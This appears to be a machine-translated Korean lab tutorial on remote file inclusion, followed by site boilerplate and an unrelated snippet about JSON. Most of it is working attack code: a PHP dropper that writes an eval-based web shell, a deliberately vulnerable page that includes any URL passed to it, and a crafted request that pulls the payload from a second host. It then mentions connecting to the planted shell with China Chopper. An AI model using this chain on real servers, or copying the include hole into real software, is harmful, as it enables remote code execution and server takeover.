[기본 실험] 원 격 파일 포함
<?php
$payload = "<?php eval(\$_POST['123']);?>";
$myfile = fopen("cforce.php", "w") or die("Unable to open file!");
fwrite($myfile,$payload);
fclose($myfile);
?>
그 다음 에 구멍 이 있 는 사이트 (10.0.3.82) 를 방문 하고 특수 한 URL 을 구성 합 니 다.
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi. php 는 구멍 이 있 는 웹 페이지 입 니 다.
<?php
if (isset($_GET["file"]))
{
@include($_GET["file"]);
#readfile($_GET["file"]);
}
?>
구멍 난 사이트 의 루트 디 렉 터 리 에 새 파일 이 생 성 되 었 습 니 다.
cforce.php
cforce.php
<?php eval($_POST['123']);?>
중국 식칼 로 연결 해 웹 셸 을 얻 을 수 있다 는 말 이다.
실험 이 끝 났 습 니 다. 원 격 파일 포함 을 통 해 웹 셸 을 얻 을 수 있 습 니 다.
이 구멍 환경 에서 파일 내용 이 PHP 문법 규범 에 부합 하면 모든 확장 자 는 PHP 로 해석 할 수 있 습 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.